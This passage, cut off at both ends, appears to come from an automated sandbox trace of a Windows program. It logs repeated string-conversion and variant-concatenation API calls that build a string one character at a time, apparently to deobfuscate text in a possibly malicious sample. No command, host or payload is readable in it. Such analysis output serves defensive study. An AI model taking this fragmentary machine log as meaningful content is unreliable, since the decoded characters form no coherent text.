lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.461] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.461] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.462] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.462] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.463] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.463] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e", lpUsedDefaultChar=0x0) returned 1 [0084.464] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0084.464] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.465] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.465] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.466] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.466] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.467] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.467] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o", lpUsedDefaultChar=0x0) returned 1 [0084.467] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0084.468] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.468] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.468] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.469] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.469] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="M", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M", lpUsedDefaultChar=0x0) returned 1 [0084.470] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="@", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="@") returned 1 [0084.470] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.471] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.471] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.472] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.472] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0084.473] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0084.473] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.473] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.474] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.475] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.475] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.476] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.476] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0084.477] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0084.477] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0084.478] VarSub (in: pvarLeft=0x28f62c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0084.478] VarCat (in: pvarLeft=0x28f63c, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.479] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.479] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0084.480] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0084.480] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.481] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.481] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.482] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.482] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.483] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.483] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.483] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.484] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.484] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.485] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.485] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.485] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…", lpUsedDefaultChar=0x0) returned 1 [0084.486] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0084.486] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.487] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.487] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.488] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.488] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.533] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.533] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.534] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.534] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.535] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.535] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G", lpUsedDefaultChar=0x0) returned 1 [0084.536] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0084.536] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.542] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.542] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.543] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.543] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.544] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.544] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.545] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.545] MultiByteToWideChar (in: 